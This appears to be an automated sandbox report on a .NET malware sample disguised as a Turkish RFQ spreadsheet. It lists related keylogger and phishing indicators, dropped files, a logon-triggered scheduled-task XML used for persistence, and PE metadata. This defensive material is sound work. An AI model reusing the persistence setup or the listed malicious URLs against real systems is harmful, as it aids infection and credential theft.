	loader.exe	Get hash	malicious	LummaC	Browse	172.67.140.193
	https://doc.triadexport.in/sen43906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab9/?top=pucom@hdel.co.kr	Get hash	malicious	HTMLPhisher	Browse	104.18.11.207
ORACLE-BMC-31898US	Snvlerier.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.130.0
	na.elf	Get hash	malicious	Unknown	Browse	130.61.64.122
	na.elf	Get hash	malicious	Unknown	Browse	130.61.69.123
	rPayment_slip.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	1728716649a09efaf02e58304d0d9f63a90bc410d1231b676f0024be47cb0cc1f511df7bca961.dat-decoded.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	20062024150836 11.10.2024.vbe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	New order PO#001498.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.6.168
	_GG__F_ __S______S_S F_S__O_ ___SO_O_.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	uV0qqqFMpL.exe	Get hash	malicious	DarkTortilla, Snake Keylogger	Browse	193.122.6.168
	uoglXqTRHC.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	Snvlerier.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	Snvlerier.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	rPayment_slip.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	1728716649a09efaf02e58304d0d9f63a90bc410d1231b676f0024be47cb0cc1f511df7bca961.dat-decoded.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	20062024150836 11.10.2024.vbe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Quotation-GINC-19-00204.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	New order PO#001498.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	PO 2024-91113.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	_GG__F_ __S______S_S F_S__O_ ___SO_O_.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	uV0qqqFMpL.exe	Get hash	malicious	DarkTortilla, Snake Keylogger	Browse	188.114.97.3
3b5074b1b5d032e5620f69f9f700ff0e	Snvlerier.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	3Af7PybsUi.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	3Af7PybsUi.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Snvlerier.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	ASL OTSL 2 ship's Particulars.xlsx.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	https://payrollruntimesheet.weebly.com/verify.html	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	SecuriteInfo.com.Win32.Evo-gen.25810.23454.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	https://shawnoreplyonlineaccess.weebly.com/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	https://shawwebmailll.weebly.com/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.log

Download File

Process:	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\qovDEn.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\qovDEn.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.379460230152629
Encrypted:	false
SSDEEP:	48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZeUyus:fLHyIFKL3IZ2KRH9OugIs
MD5:	5642382DCD1E8870729A28F428B98763
SHA1:	081E492ED9B5EEB7EAA68081F4CDCF4709BD2C4F
SHA-256:	C4AD6957A8DEDB0CFE00B95FA461174553B5B1851C5F4B6ADD4E389AB21A342A
SHA-512:	FE1A887C32242755C224AB9AF54D7D67552BD5D305A39D6275E757D09E4E34D9781B01249058BB346D9CBF0C77CB53B7D19FE6B73592189907D9F809EA066FD1
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3gbwejyd.2q3.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gwxsesfe.vsy.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k4o5ji5g.0wd.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m3v321xo.qac.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nuxsommc.0ve.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_te0ocm1v.dqo.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x0gbpkkv.ys4.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xr3025qc.miz.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp7EFB.tmp

Download File

Process:	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1579
Entropy (8bit):	5.105783946996939
Encrypted:	false
SSDEEP:	24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtwxvn:cgeLAYrFdOFzOzN33ODOiDdKrsuTAv
MD5:	388AE472BA158EBAAB5B2EEADE5BEB24
SHA1:	849F7193A8CCDF9987640519773C83E933712D90
SHA-256:	9A084556C3DA3D00FEF51905C05C0FF0252DFEFB5A1237FCA238C176C4B37C56
SHA-512:	0974EB5F880F2995A8EE63E823AF5ABB25834088599D4DCA7512A264A171D5D65EB5AF9B661D360EBDBFDC5B91BDAE19BBA36F522526A00C5B1946DBDEAE8C8F
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Local\Temp\tmp8E5C.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\qovDEn.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1579
Entropy (8bit):	5.105783946996939
Encrypted:	false
SSDEEP:	24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtwxvn:cgeLAYrFdOFzOzN33ODOiDdKrsuTAv
MD5:	388AE472BA158EBAAB5B2EEADE5BEB24
SHA1:	849F7193A8CCDF9987640519773C83E933712D90
SHA-256:	9A084556C3DA3D00FEF51905C05C0FF0252DFEFB5A1237FCA238C176C4B37C56
SHA-512:	0974EB5F880F2995A8EE63E823AF5ABB25834088599D4DCA7512A264A171D5D65EB5AF9B661D360EBDBFDC5B91BDAE19BBA36F522526A00C5B1946DBDEAE8C8F
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Roaming\qovDEn.exe

Download File

Process:	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	762880
Entropy (8bit):	7.757098584090372
Encrypted:	false
SSDEEP:	12288:ucir1S2IoOAc6/5rZGmy4SsdZno/2mgZTLH5NTE4Qj5qT/oxJu/woqrolUuI2I//:Dsd9odAH7EYT/oxJUJDTIa0
MD5:	83609DC3087AD861899A060172BA6882
SHA1:	3B28330CC112CAB13A682D846A5BC9E142688C5E
SHA-256:	3DCBEE6EE102A689E41B9198C27FCEED7962F5CE3861721032898E5771087D50
SHA-512:	9C10B040690A8D9937FCFFC10A5B642E8A5FA901EAA984FEBFC391886B2550F1C9F3BB7B3D60C3FCE6E18FDC0DEDD6600210AE2E0F3D6C3DE67AA2E649C18A98
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 26%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...[I................0................. ........@.. ....................................@.................................p...O...................................T................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......\... .......$...\|J...o...........................................0..m........r...p}......}.....(!....(.....{.....o"....{.....o"....{.....o"....{..........%.r...p.%.r...p.%.r...p.(#...&....0............{.....X}.....{.... .....4.{.... .....'.{.... .......{.... .......{.... ....3...{.....X}....+O.{.... p....4.{.... X....'.{.... @......{.... (#.....{.... .'..3...{.....X}......{....(.....{....r...p.\|....($...(%...o&....(.....{....o'..., ..{....(....,...{.....{....(......

C:\Users\user\AppData\Roaming\qovDEn.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.757098584090372
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe
File size:	762'880 bytes
MD5:	83609dc3087ad861899a060172ba6882
SHA1:	3b28330cc112cab13a682d846a5bc9e142688c5e
SHA256:	3dcbee6ee102a689e41b9198c27fceed7962f5ce3861721032898e5771087d50
SHA512:	9c10b040690a8d9937fcffc10a5b642e8a5fa901eaa984febfc391886b2550f1c9f3bb7b3d60c3fce6e18fdc0dedd6600210ae2e0f3d6c3de67aa2e649c18a98
SSDEEP:	12288:ucir1S2IoOAc6/5rZGmy4SsdZno/2mgZTLH5NTE4Qj5qT/oxJu/woqrolUuI2I//:Dsd9odAH7EYT/oxJUJDTIa0
TLSH:	99F4F1547A28AC13C1660BF10530E9B513BB2F8A7951F3DA8DD9BCEB31FA7D16601683
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...[I................0.................. ........@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4bbac2
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xA915495B [Sat Nov 22 16:35:39 2059 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbba70	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xbc000	0x3c0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xbe000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xbba54	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xb9ac8	0xb9c00	43809bd58a27cc8e429c363551a1c4e7	False	0.8826810649394348	data	7.7640586341076805	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xbc000	0x3c0	0x400	930e7bac58553c156a03ddb065bf75dd	False	0.373046875	data	3.0580548206367695	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xbe000	0xc	0x200	64b38c1f3150305e9482161219606d4b	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xbc058	0x364	data			0.39976958525345624

Imports

DLL	Import
